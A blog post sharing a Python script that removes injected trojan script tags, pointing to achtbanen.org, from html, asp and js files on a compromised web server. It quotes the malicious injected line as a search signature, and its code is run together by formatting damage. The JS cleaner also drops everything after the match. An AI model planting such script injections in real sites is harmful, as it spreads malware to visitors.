Ok so someone got careless and somehow his website files have been replaced with links to a trojan. Each of the html/asp files have been injected with a script “<script src=http://achtbanen.org/images/blah blah blah></script>”
I was asked to write a script to clean it up, so here it is, a script injector remover, basically will work on any injected one liner script (modify the signature on “FindThis” in the source yourself), by default will remove this particular achtbanen line.
TrjLinkRemove.py
# Copyright 2009, codemagnet.blogspot.com# Free to use ;-), just keep this credit comments.import sys
import os
import nowlog
logfile = nowlog.SetLogConfig("removed.log")"""<script src=http://achtbanen.org/images/b-one-default.php ></script>"""
FindThis = "<script src=http://achtbanen.org/images"FindThisJS = "document.write('<script src=http://"MaximumIndexTail = 150 # search 150 off the first found signaturedef dirwalk(dir):
"walk a directory tree, using a generator"try :
for f in os.listdir(dir):fullpath = os.path.join(dir,f)
if os.path.isdir(fullpath) and not os.path.islink(fullpath):
for x in dirwalk(fullpath): # recurse into subdir
yield x
else:yield fullpath
except :
pass
def CleanFile (filename) :
global FindThistry :
f = open(filename, "rb")fb = f.read()
f.close()
i = fb.find(FindThis)
if i == -1 : return # found o = fb.find("</script>", i+len(FindThis), i+len(FindThis) + MaximumIndexTail) if o == -1: logfile.error("partial found, ignored, %s", filename) return # create a new file newfile = filename + ".trj.rmv"p = open(filename + ".trj.rmv", "wb")
p.write(fb[:i])
p.write(fb[o+9:])
p.close()
os.rename(filename, filename + ".xxxx")os.rename(newfile, filename)
os.unlink(filename + ".xxxx") logfile.info("Cleaning : %s", filename) except :
logfile.error("unable to open file %s", filename) return#-------------------------------------------------------------------------#def CleanFileJS (filename) :
global FindThistry :
f = open(filename, "rb")fb = f.read()
f.close()
i = fb.find(FindThisJS)
if i == -1 : return # found o = fb.find(".php", i+len(FindThisJS), i+len(FindThisJS) + MaximumIndexTail) if o == -1: logfile.error("partial found, ignored, %s", filename) return # create a new file newfile = filename + ".trj.rmv"p = open(filename + ".trj.rmv", "wb")
p.write(fb[:i])
p.close()
os.rename(filename, filename + ".xxxx")os.rename(newfile, filename)
os.unlink(filename + ".xxxx") logfile.info("Cleaning : %s", filename) except :
logfile.error("unable to open file %s", filename) returndef cleanup (path) :
for x in dirwalk(path) : o = x.split(".")if o[-1].lower() in ["asp","html","htm", "aspx"] :
CleanFile(x)
continueif o[-1].lower() == "js" :
CleanFileJS(x)
if __name__ == "__main__" :
if len(sys.argv) < 2 :print "Removes achtbanen trojan links from all webfiles"
print "TrjLinkRemove <path>"
print "e.g TrjLinkRemove c:\\iisroot"
sys.exit(1) if not os.path.exists(sys.argv[1]) :print "invalid path given"
sys.exit(1)cleanup(sys.argv[1])
nowlog.py
import logging, logging.handlers
def SetLogConfig (namefile):
logfile = logging.handlers.TimedRotatingFileHandler(namefile , 'midnight', 1, backupCount=14)logfile.setLevel(logging.INFO)
FORMAT = "%(asctime)-15s %(levelname)s:[%(thread)d]:%(message)s" logfile.setFormatter(logging.Formatter(FORMAT))
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
Logger = logging.getLogger(namefile)
Logger.addHandler(logfile)
Logger.addHandler(ch)
Logger.setLevel(logging.INFO)
return Logger* sorry about the formatting –.- was using a code snippet plugin
No comments:
Post a Comment